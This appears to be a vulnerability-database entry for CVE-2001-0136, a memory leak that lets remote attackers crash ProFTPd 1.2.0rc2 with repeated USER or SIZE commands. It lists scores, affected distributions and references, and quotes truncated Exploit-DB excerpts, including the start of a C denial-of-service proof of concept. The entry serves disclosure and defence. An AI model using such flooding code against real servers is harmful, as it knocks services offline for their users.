CVE-2001-0136
Published 2001-03-12
Priority P4 23 · medium 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 44.94% (98.6th percentile)
Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| mandrakesoft | mandrake_linux | — | — |
| proftpd | proftpd | — | — |
No detection rules found.
Exploit-DB
ProFTPd 1.2.0 pre10 - Remote Denial of Service
exploitdb·2001-01-12
---
/* ProFTPd DoS version 1.1
Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master- [email protected]
Recently I posted a remote DoS for ProFTPd based in the multiple use
of the SIZE command in order to crash the system. Now and thanks to
the information provided by Wojciech Purczynski I have coded a
program that not only use the SIZE command but also the USER command.
So at this time access to the ftp is not necessary to manage a DoS
attack. The concept is equal to the last exploit one, but using
multiple USER instead of SIZE.
You don't have to give arguments when you execute the program, it
will request you these.
Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
hax man in the w0rld); Perip|o (tibe
Exploit-DB
ProFTPd 1.2.0 rc2 - Memory Leakage
exploitdb·2001-01-03
---
/*
| Proftpd DoS
| by Piotr Zurawski ([email protected])
| This source is just an example of memory leakage in proftpd-1.2.0(rc2)
| server discovered by Wojciech Purczynski.
|
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define USERNAME "anonymous"
#define PASSWORD "[email protected]"
#define HOWMANY 10000
void logintoftp();
void sendsizes();
int fd;
struct in_addr host;
unsigned short port = 21;
int tcp_connect(struct in_addr addr,unsigned short port);
int main(int argc, char **argv)
{
    if (!resolve(argv[1],&host))
    {
        fprintf(stderr,"Hostname lookup failure\n");
        exit(0);
    }
    fd=tcp_connect(host,port);
    logintoftp(fd);
    printf("Logged\n");
    sendsizes(fd);
printf("Now check out memo
Exploit-DB
ProFTPd 1.2 - 'SIZE' Remote Denial of Service
exploitdb·2000-12-20
---
source: https://www.securityfocus.com/bid/2185/info
A memory leak has been reported in all versions of ProFTPd.
The SIZE FTP command causes the server to misallocate and leak small amounts of memory each time the command is executed.
If a sufficient number of these commands are executed by the server, substantial amounts of system memory can be consumed, allowing a remote attacker to carry out a denial of service attack on the affected host.
This could be problematic if anonymous FTP is enabled or if a malicious local user has been supplied with an FTP login ID.
/* ProFTPd DoS version 1.1
Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master- [email protected]
Recently I posted a remote DoS for ProFTPd based in the multiple us
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2001-01/0122.html
http://archives.neohapsis.com/archives/bugtraq/2001-01/0132.html
http://archives.neohapsis.com/archives/bugtraq/2001-02/0267.html
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000380
http://www.debian.org/security/2001/dsa-029
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-021.php3
http://www.securityfocus.com/archive/1/152206
https://exchange.xforce.ibmcloud.com/vulnerabilities/5801